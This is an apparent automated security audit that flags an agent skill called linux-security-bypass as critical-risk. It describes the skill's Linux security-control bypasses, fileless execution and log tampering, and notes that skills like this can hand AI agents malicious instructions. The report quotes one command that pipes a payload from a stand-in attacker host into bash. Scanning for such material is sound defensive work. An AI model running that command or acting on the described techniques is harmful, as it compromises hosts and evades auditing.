linux-security-bypass
Fail
Audited by Snyk on Jul 21, 2026
Risk Level: CRITICAL
Full Analysis
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). This document is an explicit offensive playbook describing techniques to bypass Linux security controls, achieve fileless/remote code execution, and evade logging—demonstrating clear malicious intent and high abuse potential.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 1.00). The skill includes a runtime command that fetches and pipes remote code for execution via curl -sL https://attacker.com/payload | bash ddexec.sh, which downloads and executes external content at runtime.
MEDIUM W013: Attempt to modify system services in skill instructions.
- Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs bypassing kernel and MAC protections and contains commands that perform fileless execution, write/execute payloads, modify system logs/timestamps, and disable auditing — all actions that change or require elevated control of the host system.
Issues (3)
E006
CRITICALMalicious code pattern detected in skill scripts.
W012
MEDIUMUnverifiable external dependency detected (runtime URL that controls agent).
W013
MEDIUMAttempt to modify system services in skill instructions.
Audit Metadata